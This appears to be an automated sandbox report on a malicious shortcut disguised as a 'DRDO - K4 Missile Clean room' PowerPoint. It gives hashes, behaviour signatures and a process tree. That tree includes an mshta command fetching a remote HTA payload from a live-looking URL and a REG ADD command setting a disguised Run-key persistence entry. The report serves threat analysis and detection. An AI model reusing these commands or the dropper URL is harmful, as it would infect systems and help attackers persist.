Analysis

  • max time kernel
    40s
  • max time network
    104s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    10-03-2023 12:02

General

  • Target

    DRDO-K4-Missile-Clean-room/DRDO - K4 Missile Clean room.pptx.lnk

  • Size

    70KB

  • MD5

    ab11b91f97d7672da1c5b42c9ecc6d2e

  • SHA1

    feeadc91373732d65883c8351a6454a77a063ff5

  • SHA256

    a2e55cbd385971904abf619404be7ee8078ce9e3e46226d4d86d96ff31f6bb9a

  • SHA512

    d788a83a323d04b9c43328d36adcc2ffc3b7fd52e1bdec3f7bbd7c9c14bb66d75003ea8df5a9ba60b798f5aacbfb684a4955c0b806347b1809f7290e75b826d9

  • SSDEEP

    1536:ENN7MHOvYUpOQH8a8U2OPzCSyfU4YoBJrOZwHPnlThtIApDkU:hHOvY548a8Uxm5sx4JrOZIPlTHL

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\DRDO-K4-Missile-Clean-room\DRDO - K4 Missile Clean room.pptx.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1148
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DRDO - K4 Missile Clean room.pptx"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1868
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          4⤵
            PID:1804
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\HP\jquery.hta"
          3⤵
          • Loads dropped DLL
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1048
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\test.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:340
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Update Schedule" /t REG_SZ /F /D "C:\Users\Public\hp\cridviz.exe"
              5⤵
              • Adds Run key to start application
              PID:1824
          • C:\Users\Public\hp\cridviz.exe
            "C:\Users\Public\hp\cridviz.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2020

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\HP\jquery.hta

      Filesize

      177KB

      MD5

      036da574b5967c71951f4e14d000398c

      SHA1

      e612dbb34e01b41e46359019db9340e17e0390b8

      SHA256

      85faf414ed0ba9c58b9e7d4dc7388ba5597598c93b701d367d8382717fb485ec

      SHA512

      1afbfd044a039109d5d5f8f451307fdb83f66128c5b33d06c3685aabb2efbf97009680128b2f9e901b43d2f852d615e25c8012b6e7c67cbdaca7fe43c5945955

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      61KB

      MD5

      e71c8443ae0bc2e282c73faead0a6dd3

      SHA1

      0c110c1b01e68edfacaeae64781a37b1995fa94b

      SHA256

      95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

      SHA512

      b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

    • C:\Users\Admin\AppData\Local\Temp\DRDO - K4 Missile Clean room.pptx

      Filesize

      1.6MB

      MD5

      24f210da9fb419ea30c2d435a3dfd469

      SHA1

      7143a1071708fdc4be06b0b8f5fdcb66ec8d8f93

      SHA256

      b9514ed1566c8ce46ab5bfd665f8b997f2d5624740f298699df43bb108e08c4d

      SHA512

      77944b204b644c2b74b3f6deb5f78229ac78bb4bebc19e6ffb65db1003773b2373ec4cd6255914d397bc4a797c2014804e297efd25845aebaa5492574a453a84

    • C:\Users\Admin\AppData\Local\Temp\Tar30F8.tmp

      Filesize

      161KB

      MD5

      be2bec6e8c5653136d3e72fe53c98aa3

      SHA1

      a8182d6db17c14671c3d5766c72e58d87c0810de

      SHA256

      1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd

      SHA512

      0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff

    • C:\Users\Admin\AppData\Local\Temp\test.bat

      Filesize

      151B

      MD5

      05f9ac07249121d89cd4416ef466671c

      SHA1

      1e35984ccc3f685d05996a9383b0dfa297bfa571

      SHA256

      f0cc9b18ba32f95085d5f9a3539dc08832c19e7d3124a5febbdc3bae47deab24

      SHA512

      456c0133e5ecbc25137fa2bdcf524947cd5afb976a872279f4ba30ae3d64a0af0049b163f2319587f4cbf54a5d1b60943f4bd16528e3343af6e6e6fcf0133aa1

    • C:\Users\Admin\AppData\Local\Temp\test.bat

      Filesize

      151B

      MD5

      05f9ac07249121d89cd4416ef466671c

      SHA1

      1e35984ccc3f685d05996a9383b0dfa297bfa571

      SHA256

      f0cc9b18ba32f95085d5f9a3539dc08832c19e7d3124a5febbdc3bae47deab24

      SHA512

      456c0133e5ecbc25137fa2bdcf524947cd5afb976a872279f4ba30ae3d64a0af0049b163f2319587f4cbf54a5d1b60943f4bd16528e3343af6e6e6fcf0133aa1

    • C:\Users\Public\hp\DUser.dll

      Filesize

      226KB

      MD5

      2e19b7a2bbdc8082024d259e27e86911

      SHA1

      3c4c8cbab1983c775e6a76166f7b3c84dde8c8c5

      SHA256

      865e041b41b9c370a4eed91a9a407bd44a94e16e236e07be05e87de319a4486c

      SHA512

      9e87e0a1bb0181a0f705bd2dff6d092e4355c2ee1e689d98f642fc9529f07f3f6de68cd376afea901e90dd784de9b1b1bcb4144eba88a90297b6c6cdd2203703

    • C:\Users\Public\hp\cridviz.exe

      Filesize

      27KB

      MD5

      15cf85c3d904a7d8650164b0b831a318

      SHA1

      4d160e93273ac909fe2aa0ee9d25c905dec43082

      SHA256

      17eabfb88a164aa95731f198bd69a7285cc7f64acd7c289062cd3979a4a2f5bf

      SHA512

      c4c86f2d1665c9b7d7a5fa6ce53bb67df9ba0e8448c310b833fbcb6da42cccaa8e43b36f8d8a79c82f689fbf2ea2ce5a3294c8f96c3099f4239c968f956e1d4f

    • \Users\Public\hp\DUser.dll

      Filesize

      226KB

      MD5

      2e19b7a2bbdc8082024d259e27e86911

      SHA1

      3c4c8cbab1983c775e6a76166f7b3c84dde8c8c5

      SHA256

      865e041b41b9c370a4eed91a9a407bd44a94e16e236e07be05e87de319a4486c

      SHA512

      9e87e0a1bb0181a0f705bd2dff6d092e4355c2ee1e689d98f642fc9529f07f3f6de68cd376afea901e90dd784de9b1b1bcb4144eba88a90297b6c6cdd2203703

    • \Users\Public\hp\cridviz.exe

      Filesize

      27KB

      MD5

      15cf85c3d904a7d8650164b0b831a318

      SHA1

      4d160e93273ac909fe2aa0ee9d25c905dec43082

      SHA256

      17eabfb88a164aa95731f198bd69a7285cc7f64acd7c289062cd3979a4a2f5bf

      SHA512

      c4c86f2d1665c9b7d7a5fa6ce53bb67df9ba0e8448c310b833fbcb6da42cccaa8e43b36f8d8a79c82f689fbf2ea2ce5a3294c8f96c3099f4239c968f956e1d4f

    • memory/1048-163-0x0000000003830000-0x000000000383A000-memory.dmp

      Filesize

      40KB

    • memory/1048-165-0x0000000007470000-0x00000000074B0000-memory.dmp

      Filesize

      256KB

    • memory/1484-151-0x0000000006120000-0x00000000061A0000-memory.dmp

      Filesize

      512KB

    • memory/1484-149-0x0000000006120000-0x00000000061A0000-memory.dmp

      Filesize

      512KB

    • memory/1484-147-0x0000000003B80000-0x0000000003B88000-memory.dmp

      Filesize

      32KB

    • memory/1868-150-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1868-162-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB